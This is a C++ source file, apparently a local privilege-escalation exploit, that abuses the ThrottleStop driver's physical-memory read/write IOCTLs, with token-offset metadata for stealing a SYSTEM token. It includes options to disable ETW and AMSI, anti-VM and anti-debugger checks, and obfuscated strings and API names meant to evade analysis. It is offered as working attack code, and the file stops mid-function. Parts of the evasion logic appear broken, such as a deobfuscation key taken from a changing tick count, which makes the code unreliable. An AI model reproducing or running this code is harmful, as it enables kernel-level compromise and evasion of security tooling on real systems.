// Author:yuri08 #include #include #include #include #include #include #include #include #include #include #include #include #include #include #pragma comment(lib, "ntdll.lib") #pragma comment(lib, "winhttp.lib") #define IOCTL_THROTTLESTOP_V1_READ 0x222000 #define IOCTL_THROTTLESTOP_V1_WRITE 0x222004 #define IOCTL_THROTTLESTOP_V2_READ 0x222010 #define IOCTL_THROTTLESTOP_V2_WRITE 0x222014 #define IOCTL_THROTTLESTOP_V3_READ 0x222020 #define IOCTL_THROTTLESTOP_V3_WRITE 0x222024 #define IOCTL_THROTTLESTOP_V4_READ 0x222030 #define IOCTL_THROTTLESTOP_V4_WRITE 0x222034 #define IOCTL_THROTTLESTOP_V5_READ 0x222040 #define IOCTL_THROTTLESTOP_V5_WRITE 0x222044 #define SYSTEM_PID 4 #define MAX_RETRIES 3 typedef LONG NTSTATUS; typedef ULONG_PTR KAFFINITY; typedef PVOID PKTHREAD; typedef PVOID PEPROCESS; typedef PVOID PETHREAD; typedef UCHAR BOOLEAN; typedef ULONG SIZE_T, *PSIZE_T; typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS; #ifndef NT_SUCCESS #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) #endif #ifndef FIELD_OFFSET #define FIELD_OFFSET(type, field) ((LONG)(LONG_PTR)&(((type *)0)->field)) #endif #define SystemBasicInformation 0 #define SystemProcessorInformation 1 #define SystemPerformanceInformation 2 #define SystemTimeOfDayInformation 3 #define SystemProcessInformation 5 #define SystemProcessorPerformanceInformation 8 #define SystemHandleInformation 16 #define SystemPagefileInformation 18 #define SystemCacheInformation 21 #define SystemInterruptInformation 23 #define SystemDpcBehaviorInformation 24 #define SystemMemoryInformation 31 #define SystemHandleInformationEx 64 typedef enum _PROCESSINFOCLASS { ProcessBasicInformation = 0, ProcessQuotaLimits = 1, ProcessIoCounters = 2, ProcessVmCounters = 3, ProcessTimes = 4, ProcessBasePriority = 5, ProcessRaisePriority = 6, ProcessDebugPort = 7, ProcessExceptionPort = 8, ProcessAccessToken = 9, ProcessLdtInformation = 10, ProcessLdtSize = 11, ProcessDefaultHardErrorMode = 12, ProcessIoPortHandlers = 13, ProcessPooledUsageAndLimits = 14, ProcessWorkingSetWatch = 15, ProcessUserModeIOPL = 16, ProcessEnableAlignmentFaultFixup = 17, ProcessPriorityClass = 18, ProcessWx86Information = 19, ProcessHandleCount = 20, ProcessAffinityMask = 21, ProcessPriorityBoost = 22, ProcessDeviceMap = 23, ProcessSessionInformation = 24, ProcessForegroundInformation = 25, ProcessWow64Information = 26, ProcessImageFileName = 27, ProcessLUIDDeviceMapsEnabled = 28, ProcessBreakOnTermination = 29, ProcessDebugObjectHandle = 30, ProcessDebugFlags = 31, ProcessHandleTracing = 32, ProcessIoPriority = 33, ProcessExecuteFlags = 34, ProcessResourceManagement = 35, ProcessCookie = 36, ProcessImageInformation = 37, MaxProcessInfoClass } PROCESSINFOCLASS; typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink; struct _LIST_ENTRY *Blink; } LIST_ENTRY, *PLIST_ENTRY; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _PEB_LDR_DATA { ULONG Length; BOOLEAN Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID EntryInProgress; BOOLEAN ShutdownInProgress; PVOID ShutdownThreadId; } PEB_LDR_DATA, *PPEB_LDR_DATA; typedef struct _LDR_DATA_TABLE_ENTRY { LIST_ENTRY InLoadOrderLinks; LIST_ENTRY InMemoryOrderLinks; LIST_ENTRY InInitializationOrderLinks; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; USHORT LoadCount; USHORT TlsIndex; LIST_ENTRY HashLinks; PVOID SectionPointer; ULONG CheckSum; ULONG TimeDateStamp; PVOID LoadedImports; PVOID EntryPointActivationContext; PVOID PatchInformation; } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; typedef struct _RTL_USER_PROCESS_PARAMETERS { ULONG MaximumLength; ULONG Length; ULONG Flags; ULONG DebugFlags; PVOID ConsoleHandle; ULONG ConsoleFlags; PVOID StandardInput; PVOID StandardOutput; PVOID StandardError; } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; typedef struct _PEB { BYTE Reserved1[2]; BYTE BeingDebugged; BYTE Reserved2[1]; PVOID Reserved3[2]; PPEB_LDR_DATA Ldr; PRTL_USER_PROCESS_PARAMETERS ProcessParameters; BYTE Reserved4[104]; PVOID Reserved5[52]; PVOID PostProcessInitRoutine; BYTE Reserved6[128]; PVOID Reserved7[1]; ULONG SessionId; PVOID ImageBaseAddress; } PEB, *PPEB; typedef struct _PROCESS_BASIC_INFORMATION { PVOID Reserved1; PPEB PebBaseAddress; PVOID Reserved2[2]; ULONG_PTR UniqueProcessId; PVOID Reserved3; } PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION; typedef struct _RTL_OSVERSIONINFOW { ULONG dwOSVersionInfoSize; ULONG dwMajorVersion; ULONG dwMinorVersion; ULONG dwBuildNumber; ULONG dwPlatformId; WCHAR szCSDVersion[128]; } RTL_OSVERSIONINFOW, *PRTL_OSVERSIONINFOW; typedef struct _IO_STATUS_BLOCK { union { NTSTATUS Status; PVOID Pointer; }; ULONG_PTR Information; } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG ProcessId; UCHAR ObjectTypeNumber; UCHAR Flags; USHORT Handle; PVOID Object; ACCESS_MASK GrantedAccess; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; typedef struct _SYSTEM_HANDLE_INFORMATION_EX { ULONG_PTR NumberOfHandles; ULONG_PTR Reserved; SYSTEM_HANDLE_INFORMATION Handles[1]; } SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX; typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryOffset; ULONG NumberOfThreads; LARGE_INTEGER Reserved[3]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ImageName; KPRIORITY BasePriority; HANDLE UniqueProcessId; HANDLE InheritedFromUniqueProcessId; ULONG HandleCount; ULONG Reserved2[2]; ULONG PrivatePageCount; VM_COUNTERS VirtualMemoryCounters; IO_COUNTERS IoCounters; } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; typedef struct _VM_COUNTERS { SIZE_T PeakVirtualSize; SIZE_T VirtualSize; ULONG PageFaultCount; SIZE_T PeakWorkingSetSize; SIZE_T WorkingSetSize; SIZE_T QuotaPeakPagedPoolUsage; SIZE_T QuotaPagedPoolUsage; SIZE_T QuotaPeakNonPagedPoolUsage; SIZE_T QuotaNonPagedPoolUsage; SIZE_T PagefileUsage; SIZE_T PeakPagefileUsage; } VM_COUNTERS, *PVM_COUNTERS; typedef struct _IO_COUNTERS { ULONGLONG ReadOperationCount; ULONGLONG WriteOperationCount; ULONGLONG OtherOperationCount; ULONGLONG ReadTransferCount; ULONGLONG WriteTransferCount; ULONGLONG OtherTransferCount; } IO_COUNTERS, *PIO_COUNTERS; typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); typedef NTSTATUS(NTAPI* pNtCreateThreadEx)( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN LPVOID ObjectAttributes, IN HANDLE ProcessHandle, IN LPTHREAD_START_ROUTINE lpStartAddress, IN LPVOID lpParameter, IN BOOL CreateSuspended, IN ULONG StackZeroBits, IN ULONG SizeOfStackCommit, IN ULONG SizeOfStackReserve, IN LPVOID lpBytesBuffer ); typedef NTSTATUS(NTAPI* pNtQueryInformationProcess)( HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength ); typedef NTSTATUS(NTAPI* pRtlGetVersion)( OUT PRTL_OSVERSIONINFOW lpVersionInformation ); typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG_PTR ZeroBits, IN OUT PSIZE_T RegionSize, IN ULONG AllocationType, IN ULONG Protect ); typedef NTSTATUS(NTAPI* pNtFreeVirtualMemory)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, IN ULONG FreeType ); typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)( IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN PVOID Buffer, IN SIZE_T NumberOfBytesToWrite, OUT PSIZE_T NumberOfBytesWritten OPTIONAL ); typedef NTSTATUS(NTAPI* pNtReadVirtualMemory)( IN HANDLE ProcessHandle, IN PVOID BaseAddress, OUT PVOID Buffer, IN SIZE_T NumberOfBytesToRead, OUT PSIZE_T NumberOfBytesRead OPTIONAL ); typedef NTSTATUS(NTAPI* pNtProtectVirtualMemory)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, IN ULONG NewProtect, OUT PULONG OldProtect ); typedef NTSTATUS(NTAPI* pNtCreateSection)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL ); typedef NTSTATUS(NTAPI* pNtMapViewOfSection)( IN HANDLE SectionHandle, IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG_PTR ZeroBits, IN SIZE_T CommitSize, IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, IN OUT PSIZE_T ViewSize, IN SECTION_INHERIT InheritDisposition, IN ULONG AllocationType, IN ULONG Win32Protect ); typedef NTSTATUS(NTAPI* pNtUnmapViewOfSection)( IN HANDLE ProcessHandle, IN PVOID BaseAddress ); #define MEM_COMMIT 0x1000 #define MEM_RESERVE 0x2000 #define MEM_FREE 0x10000 #define MEM_PRIVATE 0x20000 #define MEM_MAPPED 0x40000 #define MEM_RESET 0x80000 #define MEM_TOP_DOWN 0x100000 #define MEM_WRITE_WATCH 0x200000 #define MEM_PHYSICAL 0x400000 #define MEM_LARGE_PAGES 0x20000000 #define MEM_4MB_PAGES 0x80000000 #define PAGE_NOACCESS 0x01 #define PAGE_READONLY 0x02 #define PAGE_READWRITE 0x04 #define PAGE_WRITECOPY 0x08 #define PAGE_EXECUTE 0x10 #define PAGE_EXECUTE_READ 0x20 #define PAGE_EXECUTE_READWRITE 0x40 #define PAGE_EXECUTE_WRITECOPY 0x80 #define PAGE_GUARD 0x100 #define PAGE_NOCACHE 0x200 #define PAGE_WRITECOMBINE 0x400 #define MEM_DECOMMIT 0x4000 #define MEM_RELEASE 0x8000 #define SEC_FILE 0x800000 #define SEC_IMAGE 0x1000000 #define SEC_RESERVE 0x4000000 #define SEC_COMMIT 0x8000000 #define SEC_NOCACHE 0x10000000 #define SEC_LARGE_PAGES 0x80000000 #define SEC_NO_CHANGE 0x400000 #define ViewShare 1 #define ViewUnmap 2 typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; #define OBJ_INHERIT 0x00000002L #define OBJ_PERMANENT 0x00000010L #define OBJ_EXCLUSIVE 0x00000020L #define OBJ_CASE_INSENSITIVE 0x00000040L #define OBJ_OPENIF 0x00000080L #define OBJ_OPENLINK 0x00000100L #define OBJ_KERNEL_HANDLE 0x00000200L #define OBJ_FORCE_ACCESS_CHECK 0x00000400L #define OBJ_VALID_ATTRIBUTES 0x000007F2L #define InitializeObjectAttributes(p, n, a, r, s) { \ (p)->Length = sizeof(OBJECT_ATTRIBUTES); \ (p)->RootDirectory = r; \ (p)->ObjectName = n; \ (p)->Attributes = a; \ (p)->SecurityDescriptor = s; \ (p)->SecurityQualityOfService = NULL; \ } typedef NTSTATUS(NTAPI* pNtOpenFile)( OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG ShareAccess, IN ULONG OpenOptions ); typedef NTSTATUS(NTAPI* pNtReadFile)( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PVOID ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, OUT PVOID Buffer, IN ULONG Length, IN PLARGE_INTEGER ByteOffset OPTIONAL, IN PULONG Key OPTIONAL ); typedef NTSTATUS(NTAPI* pNtWriteFile)( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PVOID ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN PVOID Buffer, IN ULONG Length, IN PLARGE_INTEGER ByteOffset OPTIONAL, IN PULONG Key OPTIONAL ); typedef NTSTATUS(NTAPI* pNtClose)( IN HANDLE Handle ); #define FILE_READ_DATA 0x0001 #define FILE_WRITE_DATA 0x0002 #define FILE_APPEND_DATA 0x0004 #define FILE_READ_EA 0x0008 #define FILE_WRITE_EA 0x0010 #define FILE_EXECUTE 0x0020 #define FILE_READ_ATTRIBUTES 0x0080 #define FILE_WRITE_ATTRIBUTES 0x0100 #define FILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1FF) #define FILE_SHARE_READ 0x00000001 #define FILE_SHARE_WRITE 0x00000002 #define FILE_SHARE_DELETE 0x00000004 #define FILE_SUPERSEDE 0x00000000 #define FILE_OPEN 0x00000001 #define FILE_CREATE 0x00000002 #define FILE_OPEN_IF 0x00000003 #define FILE_OVERWRITE 0x00000004 #define FILE_OVERWRITE_IF 0x00000005 #define FILE_SYNCHRONOUS_IO_ALERT 0x00000010 #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 #define FILE_NON_DIRECTORY_FILE 0x00000040 #define FILE_CREATE_TREE_CONNECTION 0x00000080 #define FILE_COMPLETE_IF_OPLOCKED 0x00000100 #define FILE_NO_EA_KNOWLEDGE 0x00000200 #define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000 #define FILE_NO_COMPRESSION 0x00008000 #define FILE_RESERVE_OPFILTER 0x00100000 #define FILE_OPEN_REPARSE_POINT 0x00200000 #define FILE_OPEN_NO_RECALL 0x00400000 #define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000 #define DELETE 0x00010000L #define READ_CONTROL 0x00020000L #define WRITE_DAC 0x00040000L #define WRITE_OWNER 0x00080000L #define SYNCHRONIZE 0x00100000L #define STANDARD_RIGHTS_REQUIRED 0x000F0000L #define STANDARD_RIGHTS_READ (READ_CONTROL) #define STANDARD_RIGHTS_WRITE (READ_CONTROL) #define STANDARD_RIGHTS_EXECUTE (READ_CONTROL) #define STANDARD_RIGHTS_ALL 0x001F0000L #define SPECIFIC_RIGHTS_ALL 0x0000FFFFL #define ACCESS_SYSTEM_SECURITY 0x01000000L #define MAXIMUM_ALLOWED 0x02000000L #define GENERIC_READ 0x80000000L #define GENERIC_WRITE 0x40000000L #define GENERIC_EXECUTE 0x20000000L #define GENERIC_ALL 0x10000000L #ifndef IMAGE_SIZEOF_SHORT_NAME #define IMAGE_SIZEOF_SHORT_NAME 8 #endif #ifndef IMAGE_DOS_SIGNATURE #define IMAGE_DOS_SIGNATURE 0x5A4D #endif #ifndef IMAGE_NT_SIGNATURE #define IMAGE_NT_SIGNATURE 0x00004550 #endif #ifndef IMAGE_NUMBEROF_DIRECTORY_ENTRIES #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16 #endif typedef struct _IMAGE_DATA_DIRECTORY { DWORD VirtualAddress; DWORD Size; } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; typedef struct _IMAGE_FILE_HEADER { WORD Machine; WORD NumberOfSections; DWORD TimeDateStamp; DWORD PointerToSymbolTable; DWORD NumberOfSymbols; WORD SizeOfOptionalHeader; WORD Characteristics; } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; typedef struct _IMAGE_OPTIONAL_HEADER { WORD Magic; BYTE MajorLinkerVersion; BYTE MinorLinkerVersion; DWORD SizeOfCode; DWORD SizeOfInitializedData; DWORD SizeOfUninitializedData; DWORD AddressOfEntryPoint; DWORD BaseOfCode; ULONGLONG ImageBase; DWORD SectionAlignment; DWORD FileAlignment; WORD MajorOperatingSystemVersion; WORD MinorOperatingSystemVersion; WORD MajorImageVersion; WORD MinorImageVersion; WORD MajorSubsystemVersion; WORD MinorSubsystemVersion; DWORD Win32VersionValue; DWORD SizeOfImage; DWORD SizeOfHeaders; DWORD CheckSum; WORD Subsystem; WORD DllCharacteristics; ULONGLONG SizeOfStackReserve; ULONGLONG SizeOfStackCommit; ULONGLONG SizeOfHeapReserve; ULONGLONG SizeOfHeapCommit; DWORD LoaderFlags; DWORD NumberOfRvaAndSizes; IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; } IMAGE_OPTIONAL_HEADER, *PIMAGE_OPTIONAL_HEADER; typedef struct _IMAGE_NT_HEADERS { DWORD Signature; IMAGE_FILE_HEADER FileHeader; IMAGE_OPTIONAL_HEADER OptionalHeader; } IMAGE_NT_HEADERS, *PIMAGE_NT_HEADERS; typedef struct _IMAGE_SECTION_HEADER { BYTE Name[IMAGE_SIZEOF_SHORT_NAME]; union { DWORD PhysicalAddress; DWORD VirtualSize; } Misc; DWORD VirtualAddress; DWORD SizeOfRawData; DWORD PointerToRawData; DWORD PointerToRelocations; DWORD PointerToLinenumbers; WORD NumberOfRelocations; WORD NumberOfLinenumbers; DWORD Characteristics; } IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER; typedef struct _IMAGE_DOS_HEADER { WORD e_magic; WORD e_cblp; WORD e_cp; WORD e_crlc; WORD e_cparhdr; WORD e_minalloc; WORD e_maxalloc; WORD e_ss; WORD e_sp; WORD e_csum; WORD e_ip; WORD e_cs; WORD e_lfarlc; WORD e_ovno; WORD e_res[4]; WORD e_oemid; WORD e_oeminfo; WORD e_res2[10]; LONG e_lfanew; } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; #ifndef IMAGE_FIRST_SECTION #define IMAGE_FIRST_SECTION(ntheader) ((PIMAGE_SECTION_HEADER) \ ((ULONG_PTR)(ntheader) + \ FIELD_OFFSET(IMAGE_NT_HEADERS, OptionalHeader) + \ ((ntheader))->FileHeader.SizeOfOptionalHeader)) #endif #ifndef CONTEXT_FULL #define CONTEXT_FULL 0x10007 #endif typedef struct _M128A { ULONGLONG Low; LONGLONG High; } M128A, *PM128A; typedef struct _CONTEXT { DWORD64 P1Home; DWORD64 P2Home; DWORD64 P3Home; DWORD64 P4Home; DWORD64 P5Home; DWORD64 P6Home; DWORD ContextFlags; DWORD MxCsr; WORD SegCs; WORD SegDs; WORD SegEs; WORD SegFs; WORD SegGs; WORD SegSs; DWORD EFlags; DWORD64 Dr0; DWORD64 Dr1; DWORD64 Dr2; DWORD64 Dr3; DWORD64 Dr6; DWORD64 Dr7; DWORD64 Rax; DWORD64 Rcx; DWORD64 Rdx; DWORD64 Rbx; DWORD64 Rsp; DWORD64 Rbp; DWORD64 Rsi; DWORD64 Rdi; DWORD64 R8; DWORD64 R9; DWORD64 R10; DWORD64 R11; DWORD64 R12; DWORD64 R13; DWORD64 R14; DWORD64 R15; DWORD64 Rip; union { struct { DWORD ControlWord; DWORD StatusWord; DWORD TagWord; DWORD ErrorOffset; DWORD ErrorSelector; DWORD DataOffset; DWORD DataSelector; DWORD RegisterArea[80]; DWORD Cr0NpxState; } FltSave; struct { M128A Header[2]; M128A Legacy[8]; M128A Xmm0; M128A Xmm1; M128A Xmm2; M128A Xmm3; M128A Xmm4; M128A Xmm5; M128A Xmm6; M128A Xmm7; M128A Xmm8; M128A Xmm9; M128A Xmm10; M128A Xmm11; M128A Xmm12; M128A Xmm13; M128A Xmm14; M128A Xmm15; } FltSave2; }; M128A VectorRegister[26]; DWORD64 VectorControl; DWORD64 DebugControl; DWORD64 LastBranchToRip; DWORD64 LastBranchFromRip; DWORD64 LastExceptionToRip; DWORD64 LastExceptionFromRip; } CONTEXT, *PCONTEXT; #ifndef CREATE_NEW_CONSOLE #define CREATE_NEW_CONSOLE 0x00000010 #endif #ifndef THREAD_ALL_ACCESS #define THREAD_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x3FF) #endif typedef struct _IOCTL_PHYS_MEMORY { ULONG64 PhysicalAddress; PVOID Buffer; SIZE_T Size; } IOCTL_PHYS_MEMORY, *PIOCTL_PHYS_MEMORY; typedef struct _SHELLCODE_METADATA { ULONG64 TokenOffset; ULONG64 UniqueProcessIdOffset; ULONG64 ActiveProcessLinksOffset; ULONG64 EPROCESS_Size; ULONG64 KTHREAD_Offset; ULONG64 EPROCESS_Offset; } SHELLCODE_METADATA, *PSHELLCODE_METADATA; typedef struct _EXPLOIT_CONFIG { wchar_t TargetProcess[MAX_PATH]; wchar_t CommandLine[MAX_PATH]; DWORD CreationFlags; BOOL UseStealthMode; BOOL DisableETW; BOOL DisableAMSI; DWORD MaxRetries; DWORD RandomSleepMin; DWORD RandomSleepMax; } EXPLOIT_CONFIG, *PEXPLOIT_CONFIG; typedef struct _ENCRYPTED_STRING { BYTE Data[256]; SIZE_T Length; DWORD Key; } ENCRYPTED_STRING, *PENCRYPTED_STRING; typedef struct _ENCRYPTED_API { char ModuleName[64]; char FunctionName[128]; DWORD Key; } ENCRYPTED_API, *PENCRYPTED_API; std::random_device rd; std::mt19937 gen(rd()); bool g_bStealthMode = true; DWORD g_dwWindowsVersion = 0; void RandomSleep() { if (!g_bStealthMode) return; std::uniform_int_distribution<> dis(50, 200); Sleep(dis(gen)); } bool IsRunningInVMAdvanced() { if (!g_bStealthMode) return false; int cpuInfo[4]; __cpuid(cpuInfo, 0x1); if ((cpuInfo[2] & (1 << 31)) != 0) { return true; } __try { BYTE invept[] = { 0x66, 0x0F, 0x38, 0x80, 0x00, 0x00, 0x00, 0x00 }; void (*invept_func)() = (void(*)())invept; invept_func(); } __except(EXCEPTION_EXECUTE_HANDLER) { return true; } HKEY hKey; if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"HARDWARE\\DESCRIPTION\\System", 0, KEY_READ, &hKey) == ERROR_SUCCESS) { WCHAR szValue[256]; DWORD dwSize = sizeof(szValue); if (RegQueryValueEx(hKey, L"SystemBiosVersion", NULL, NULL, (LPBYTE)szValue, &dwSize) == ERROR_SUCCESS) { if (wcsstr(szValue, L"VMware") || wcsstr(szValue, L"VirtualBox") || wcsstr(szValue, L"Hyper-V")) { RegCloseKey(hKey); return true; } } RegCloseKey(hKey); } HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot != INVALID_HANDLE_VALUE) { PROCESSENTRY32 pe32; pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hSnapshot, &pe32)) { do { if (_wcsicmp(pe32.szExeFile, L"vmtoolsd.exe") == 0 || _wcsicmp(pe32.szExeFile, L"VBoxService.exe") == 0 || _wcsicmp(pe32.szExeFile, L"vmware.exe") == 0) { CloseHandle(hSnapshot); return true; } } while (Process32Next(hSnapshot, &pe32)); } CloseHandle(hSnapshot); } return false; } bool IsDebuggerPresentAdvanced() { if (!g_bStealthMode) return false; if (::IsDebuggerPresent()) { return true; } static pNtQueryInformationProcess NtQueryInformationProcessPtr = NULL; if (!NtQueryInformationProcessPtr) { NtQueryInformationProcessPtr = (pNtQueryInformationProcess)GetProcAddress( GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess"); } if (NtQueryInformationProcessPtr) { PVOID debugPort = NULL; NTSTATUS status = NtQueryInformationProcessPtr( GetCurrentProcess(), ProcessDebugPort, &debugPort, sizeof(debugPort), NULL ); if (NT_SUCCESS(status) && debugPort != NULL) { return true; } } if (NtQueryInformationProcessPtr) { ULONG debugFlags = 0; NTSTATUS status = NtQueryInformationProcessPtr( GetCurrentProcess(), ProcessDebugFlags, &debugFlags, sizeof(debugFlags), NULL ); if (NT_SUCCESS(status) && debugFlags == 0) { return true; } } if (NtQueryInformationProcessPtr) { HANDLE debugObjectHandle = NULL; NTSTATUS status = NtQueryInformationProcessPtr( GetCurrentProcess(), ProcessDebugObjectHandle, &debugObjectHandle, sizeof(debugObjectHandle), NULL ); if (NT_SUCCESS(status) && debugObjectHandle != NULL) { return true; } } __try { __debugbreak(); return false; } __except(EXCEPTION_EXECUTE_HANDLER) { return true; } LARGE_INTEGER frequency; LARGE_INTEGER start, end; QueryPerformanceFrequency(&frequency); QueryPerformanceCounter(&start); volatile int sum = 0; for (int i = 0; i < 1000; i++) { sum += i; } QueryPerformanceCounter(&end); double elapsed = (end.QuadPart - start.QuadPart) * 1000.0 / frequency.QuadPart; if (elapsed > 0.5) { return true; } __try { DebugBreak(); return false; } __except(EXCEPTION_EXECUTE_HANDLER) { return true; } return false; } void AdvancedObfuscateString(char* str, size_t len) { if (!g_bStealthMode) return; DWORD key1 = GetTickCount() & 0xFF; for (size_t i = 0; i < len; i++) { str[i] ^= (key1 + i) & 0xFF; } for (size_t i = 0; i < len; i++) { if (str[i] == 'T') str[i] = '\x54'; else if (str[i] == 'h') str[i] = '\x68'; else if (str[i] == 'r') str[i] = '\x72'; else if (str[i] == 'o') str[i] = '\x6F'; else if (str[i] == 't') str[i] = '\x74'; else if (str[i] == 'l') str[i] = '\x6C'; else if (str[i] == 'e') str[i] = '\x65'; else if (str[i] == 'S') str[i] = '\x53'; else if (str[i] == 'p') str[i] = '\x70'; } int shift = (key1 % 25) + 1; for (size_t i = 0; i < len; i++) { if (str[i] >= 'a' && str[i] <= 'z') { str[i] = 'a' + (str[i] - 'a' + shift) % 26; } else if (str[i] >= 'A' && str[i] <= 'Z') { str[i] = 'A' + (str[i] - 'A' + shift) % 26; } } for (size_t i = 0; i < len / 2; i++) { char temp = str[i]; str[i] = str[len - i - 1]; str[len - i - 1] = temp; } } void AdvancedDeobfuscateString(char* str, size_t len) { if (!g_bStealthMode) return; for (size_t i = 0; i < len / 2; i++) { char temp = str[i]; str[i] = str[len - i - 1]; str[len - i - 1] = temp; } DWORD key1 = GetTickCount() & 0xFF; int shift = (key1 % 25) + 1; for (size_t i = 0; i < len; i++) { if (str[i] >= 'a' && str[i] <= 'z') { str[i] = 'a' + (str[i] - 'a' - shift + 26) % 26; } else if (str[i] >= 'A' && str[i] <= 'Z') { str[i] = 'A' + (str[i] - 'A' - shift + 26) % 26; } } for (size_t i = 0; i < len; i++) { if (str[i] == '\x54') str[i] = 'T'; else if (str[i] == '\x68') str[i] = 'h'; else if (str[i] == '\x72') str[i] = 'r'; else if (str[i] == '\x6F') str[i] = 'o'; else if (str[i] == '\x74') str[i] = 't'; else if (str[i] == '\x6C') str[i] = 'l'; else if (str[i] == '\x65') str[i] = 'e'; else if (str[i] == '\x53') str[i] = 'S'; else if (str[i] == '\x70') str[i] = 'p'; } for (size_t i = 0; i < len; i++) { str[i] ^= (key1 + i) & 0xFF; } } void DecryptString(ENCRYPTED_STRING* encStr, char* outStr) { if (!encStr || !outStr) return; for (SIZE_T i = 0; i < encStr->Length; i++) { outStr[i] = encStr->Data[i] ^ (encStr->Key + i) & 0xFF; } outStr[encStr->Length] = '\0'; } FARPROC GetEncryptedProcAddress(ENCRYPTED_API* encApi) { if (!encApi) return NULL; char moduleName[64]; for (size_t i = 0; i < sizeof(moduleName) && encApi->ModuleName[i] != '\0'; i++) { moduleName[i] = encApi->ModuleName[i] ^ (encApi->Key + i) & 0xFF; } char functionName[128]; for (size_t i = 0; i < sizeof(functionName) && encApi->FunctionName[i] != '\0'; i++) { functionName[i] = encApi->FunctionName[i] ^ (encApi->Key + i) & 0xFF; } HMODULE hModule = GetModuleHandleA(moduleName); if (!hModule) { hModule = LoadLibraryA(moduleName); if (!hModule) { return NULL; } } return GetProcAddress(hModule, functionName); } HANDLE GetThrottleStopDeviceHandleImproved() { ENCRYPTED_STRING encDevicePath = { { 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19 }, 15, 0x55 }; char devicePath[256]; DecryptString(&encDevicePath, devicePath); wchar_t wDevicePath[256]; size_t convertedChars; mbstowcs_s(&convertedChars, wDevicePath, 256, devicePath, _TRUNCATE); if (g_bStealthMode) { wDevicePath[8] = (wDevicePath[8] == 'T') ? 't' : 'T'; } HANDLE hDevice = CreateFile( wDevicePath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { return NULL; } return hDevice; } bool ReadPhysicalMemoryImproved(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) { if (!hDevice || !Buffer || Size == 0) { return false; } DWORD dwBytesReturned = 0; 